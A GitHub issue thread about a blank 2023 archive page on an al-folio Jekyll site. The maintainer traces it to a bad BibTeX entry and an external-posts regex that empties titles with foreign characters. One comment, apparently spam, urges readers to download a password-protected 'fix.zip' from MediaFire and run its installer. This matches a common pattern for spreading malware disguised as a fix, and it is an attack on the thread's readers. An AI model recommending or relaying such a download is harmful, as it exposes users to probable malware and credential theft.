### ISSUE TITLE
Blogs sorted by a certain year are having issues

### ISSUE THREAD

**Issue by fanyangCS** [alshedivat/al-folio#2665]
### Have you checked that your issue isn't already filed?

- [X] I read through [FAQ](https://github.com/alshedivat/al-folio/blob/master/FAQ.md) and searched through the [past issues](https://github.com/alshedivat/al-folio/issues), none of which addressed my issue.
- [X] Yes, I have checked that this issue isn't already filed.

### Bug description

when blogs sorted by years, i.e., 2020, 2022, 2023, and 2024, the year of 2023 shows a blank page, but all other years look fine

### How to reproduce the bug

The problematic blog year is here: [blogs in 2023](https://fanyangcs.github.io/blog/2023/). Other year looks fine: [blogs in 2024](https://fanyangcs.github.io/blog/2024/)

### Error messages and logs

see full logs here: https://github.com/fanyangCS/fanyangcs.github.io/actions/runs/10590121696/job/29345374852
the config yml file here: https://github.com/fanyangCS/fanyangcs.github.io/blob/master/_config.yml

Below are suspected logs:

 AutoPages: Disabled/Not configured in site.config.
        Pagination: Complete, processed 1 pagination page(s)
W, [2024-08-28 04:21:18 #1903]  WARN -- : Lexer: unexpected token `\' at 21708; brace level 1; mode :bibtex.
W, [2024-08-28 04:21:22 #1903]  WARN -- : Lexer: unexpected token `\' at 21708; brace level 1; mode :bibtex.
[NbConvertApp] Converting notebook /tmp/jekyll-jupyter-notebook20240828-1903-ssrj0u.ipynb to html
           Warning: Empty `slug` generated for '--'.
          Conflict: The following destination is shared by multiple files.
                    The written file may end up with unexpected contents.
                    /home/runner/work/fanyangcs.github.io/fanyangcs.github.io/_site/blog/2023/index.html
                     - blog/2023/index.html
                     - /home/runner/work/fanyangcs.github.io/fanyangcs.github.io/_posts/--.md
                    
          Conflict: The following destination is shared by multiple files.
                    The written file may end up with unexpected contents.
                    /home/runner/work/fanyangcs.github.io/fanyangcs.github.io/_site/blog/2024/.md/index.html
                     - /home/runner/work/fanyangcs.github.io/fanyangcs.github.io/_posts/.md
                     - /home/runner/work/fanyangcs.github.io/fanyangcs.github.io/_posts/.md
                     - /home/runner/work/fanyangcs.github.io/fanyangcs.github.io/_posts/.md
                    
                    done in 190.413 seconds.
 Auto-regeneration: disabled. Use --watch to enable.

### What operating system are you using?

Not applicable.
I am using GitHub Pages to compile, build, and deploy directly.

### Where are you seeing the problem on?

Deployed site

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by george-gca** [comment]
Does this also happens when running locally?

I took a look at your posts and everything seems fine. The only "unusual" thing I saw was that none of your posts have either description, tags, or categories. Just to take these out of the equation, can you fill these fields and test again?

**Comment by fanyangCS** [comment]
I removed all the local posts and it is the same. Maybe it is due to external posts?

**Comment by george-gca** [comment]
The `mode :bibtex` in your error means that your bib file is wrong. I recommend using something like [bibtex-tidy](https://flamingtempura.github.io/bibtex-tidy/) to clean and format it a bit. For example, [in here](https://github.com/fanyangCS/fanyangcs.github.io/blob/d98719e92fdf1d9ebd5b4a68fc36cea6aa14c88c/_bibliography/papers.bib#L385) you have a \ after a comma that is invalidating your bib file.

Now, about the 2023 blog posts is probably something related to external blog posts, but I am not sure what. This requires further investigation.

**Comment by george-gca** [comment]
Just found out what is your issue, and yes: it is because of external posts. More specifically, your posts have foreign characters, and as the regex to replace chars in the external posts plugin replace those, the title ends up empty and it gives this error. I will upload a patch for it soon.

**Comment by fanyangCS** [comment]
Yes, it is fixed. Thanks!
